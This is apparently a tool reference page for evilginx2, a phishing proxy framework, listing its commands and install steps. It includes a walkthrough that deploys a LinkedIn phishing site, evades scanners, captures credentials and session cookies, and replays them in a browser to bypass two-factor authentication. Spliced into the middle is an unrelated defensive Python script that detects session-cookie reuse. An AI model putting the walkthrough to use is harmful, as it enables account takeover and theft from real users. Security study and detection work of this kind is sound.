evilginx2
evilginx2 Description
evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows bypassing 2-factor authentication protection.
This tool is a successor to Evilginx, released in 2017, which used a custom version of the nginx HTTP server to provide man-in-the-middle functionality, acting as a proxy between a browser and the phished website. The present version is written entirely in Go as a standalone application that implements its own HTTP and DNS server, making it extremely easy to set up and use.
Homepage: https://github.com/kgretzky/evilginx2
Author: Kuba Gretzky
License: GPLv3
evilginx2 Help
Usage:
./evilginx
Options:
-debug : Enable debug output
-developer : Enable developer mode (generates self-signed certificates for all hostnames)
-p string : Phishlets directory path
evilginx2 Commands
general
config : manage general configuration
phishlets : manage phishlets configuration
sessions : manage sessions and captured tokens with credentials
lures : manage lures for generation of phishing urls
clear : clears the screen
config
Shows the values of all configuration variables and allows changing them.
config : show all configuration variables
config domain <domain> : set base domain for all phishlets (e.g. evilsite.com)
config ip <ip_address> : set ip address of the current server
config redirect_key <name> : change name of the redirect parameter in phishing url (phishing urls will need to be regenerated)
config verification_key <name> : change name of the verification parameter in phishing url (phishing urls will need to be regenerated)
config verification_token <token> : change the value of the verification token (phishing urls will need to be regenerated)
config redirect_url <url> : change the url where all unauthorized requests will be redirected to (phishing urls will need to be regenerated)
phishlets
Shows the status of all available phishlets and allows changing their parameters and enabled status.
phishlets : show status of all available phishlets
phishlets hostname <phishlet> <hostname> : set hostname for given phishlet (e.g. this.is.not.a.phishing.site.evilsite.com)
phishlets enable <phishlet> : enables phishlet and requests ssl/tls certificate if needed
phishlets disable <phishlet> : disables phishlet
phishlets hide <phishlet> : hides the phishing page, logging and redirecting all requests to it (good for avoiding scanners when sending out phishing links)
phishlets unhide <phishlet> : makes the phishing page available and reachable from the outside
phishlets get-url <phishlet> <redirect_url> : generates phishing url with redirection on successful authentication
phishlets get-hosts <phishlet> : generates entries for hosts file in order to use localhost for testing
sessions
Shows all captured credentials and authentication tokens. Allows viewing the full history of visits and deleting logged sessions.
sessions : show history of all logged visits and captured credentials
sessions <id> : show session details, including captured authentication tokens, if available
sessions delete <id> : delete logged session with <id> (ranges with separators are allowed e.g. 1-7,10-12,15-25)
sessions delete all : delete all logged sessions
lures
Shows all created lures and allows editing or deleting them.
lures : show all create lures
lures <id> : show details of a lure with a given <id>
lures create <phishlet> : creates new lure for given <phishlet>
lures delete <id> : deletes lure with given <id>
lures delete all : deletes all created lures
lures edit path <id> <path> : sets custom url <path> for a lure with a given <id>
lures edit redirect_url <id> <redirect_url> : sets redirect url that user will be navigated to on successful authorization, for a lure with a given <id>
lures edit phishlet <id> <phishlet> : change the phishlet, the lure with a given <id> applies to
lures edit info <id> <info> : set personal information to describe a lure with a given <id> (display only)
lures edit og_title <id> <title> : sets opengraph title that will be shown in link preview, for a lure with a given <id>
lures edit og_desc <id> <title> : sets opengraph description that will be shown in link preview, for a lure with a given <id>
lures edit og_image <id> <title> : sets opengraph image url that will be shown in link preview, for a lure with a given <id>
lures edit og_url <id> <title> : sets opengraph url that will be shown in link preview, for a lure with a given <id>
lures edit params <id> <key=value> : adds, edits or removes custom parameters (used in javascript injections), for a lure with a given <id>
evilginx2 Usage Example
To get up and running, you need to first do some setting up.
At this point I assume you've already registered a domain (let's call it yourdomain.com) and set up the nameservers (both ns1 and ns2) in your domain provider's admin panel to point to your server's IP (e.g. 10.0.0.1):
ns1.yourdomain.com = 10.0.0.1
ns2.yourdomain.com = 10.0.0.1
In evilginx2, set up your server's domain and IP using the following commands:
config domain yourdomain.com
config ip 10.0.0.1
Now you can set up the phishlet you want to use. For the sake of this short guide, we will use a LinkedIn phishlet. Set up the hostname for the phishlet (it must contain your domain obviously):
phishlets hostname linkedin my.phishing.hostname.yourdomain.com
And now you can enable the phishlet, which will initiate automatic retrieval of LetsEncrypt SSL/TLS certificates if none are locally found for the hostname you picked:
phishlets enable linkedin
Your phishing site is now live. Decide which URL the victim should be redirected to on successful login, then get the phishing URL like this (the victim will be redirected to https://www.google.com):
phishlets get-url linkedin https://www.google.com
Running phishlets will only respond to tokenized links, so any scanners that scan your main domain will be redirected to the URL specified as redirect_url under config. If you want to hide your phishlet and make it not respond even to valid tokenized phishing URLs, use the phishlets hide/unhide <phishlet> command.
You can monitor captured credentials and session cookies with:
sessions
To get detailed information about the captured session, with the session cookie itself (it will be printed in JSON format at the bottom), select its session ID:
sessions <id>
The captured session cookie can be copied and imported into the Chrome browser using the EditThisCookie extension.
Important! If you want evilginx2 to continue running after you log out from your server, you should run it inside a screen session.
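A defender-side check for the session cookie replay described above, as an added example that is not part of the original page or the evilginx2 project: it scans application access events for a session token presented by a client other than the one that logged in. The log format, field names and sample lines are constructed assumptions.

```python
import json
from collections import namedtuple

# Constructed sample events (JSON lines); the field names are assumptions.
SAMPLE_LOG = """\
{"ts": 100, "event": "login", "session": "s-aaa", "ip": "198.51.100.7", "ua": "Chrome/120 Windows"}
{"ts": 130, "event": "request", "session": "s-aaa", "ip": "198.51.100.7", "ua": "Chrome/120 Windows"}
{"ts": 200, "event": "login", "session": "s-bbb", "ip": "203.0.113.50", "ua": "Chrome/120 Windows"}
{"ts": 260, "event": "request", "session": "s-bbb", "ip": "192.0.2.99", "ua": "Chrome/119 Linux"}
{"ts": 265, "event": "request", "session": "s-bbb", "ip": "192.0.2.99", "ua": "Chrome/119 Linux"}
{"ts": 300, "event": "login", "session": "s-ccc", "ip": "198.51.100.8", "ua": "Firefox/121 macOS"}
{"ts": 900, "event": "request", "session": "s-ccc", "ip": "198.51.100.200", "ua": "Firefox/121 macOS"}
this line is truncated {"ts":
"""

REQUIRED = {"ts", "event", "session", "ip", "ua"}
Finding = namedtuple("Finding", "session ts severity changed")

def parse_events(text):
    """Yield well-formed events; malformed or incomplete lines are skipped."""
    for line in text.splitlines():
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(ev, dict) and REQUIRED <= ev.keys():
            yield ev

def find_session_reuse(text):
    """Flag session tokens presented by a client other than the one they were issued to."""
    issued = {}       # session id -> (ip, ua) recorded at login
    reported = set()  # (session id, ip, ua) already reported, to avoid duplicates
    findings = []
    for ev in sorted(parse_events(text), key=lambda e: e["ts"]):
        sid, client = ev["session"], (ev["ip"], ev["ua"])
        if ev["event"] == "login":
            issued[sid] = client
            continue
        origin = issued.get(sid)  # None: login not in this log, nothing to compare against
        if origin is None or client == origin or (sid, *client) in reported:
            continue
        reported.add((sid, *client))
        changed = [name for name, a, b in zip(("ip", "ua"), origin, client) if a != b]
        # Both attributes changing at once is a stronger signal than an IP change
        # alone, which also happens when a legitimate user roams between networks.
        severity = "high" if len(changed) == 2 else "low"
        findings.append(Finding(sid, ev["ts"], severity, tuple(changed)))
    return findings

if __name__ == "__main__":
    for finding in find_session_reuse(SAMPLE_LOG):
        print(finding)
```

A "high" finding is a candidate for revoking the session and forcing re-authentication; "low" findings are better used as input to risk scoring than as alerts on their own.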
How to install evilginx2
Installation on Kali Linux
wget -O evilginx_linux.zip https://github.com`curl -s https://github.com/kgretzky/evilginx2/releases | grep -E -o '/kgretzky/evilginx2/releases/download/[0-9.]+/evilginx_linux[0-9a-z._]+zip' | head -n 1`
unzip evilginx_linux.zip -d evilginx
rm evilginx_linux.zip
cd evilginx/
chmod 700 ./evilginx
sudo ./evilginx
Installation on Linux (Debian, Mint, Ubuntu)
wget -O evilginx_linux.zip https://github.com`curl -s https://github.com/kgretzky/evilginx2/releases | grep -E -o '/kgretzky/evilginx2/releases/download/[0-9.]+/evilginx_linux[0-9a-z._]+zip' | head -n 1`
unzip evilginx_linux.zip -d evilginx
rm evilginx_linux.zip
cd evilginx/
chmod 700 ./evilginx
sudo ./evilginx
evilginx2 Tutorials
- How to bypass two-factor authentication with evilginx2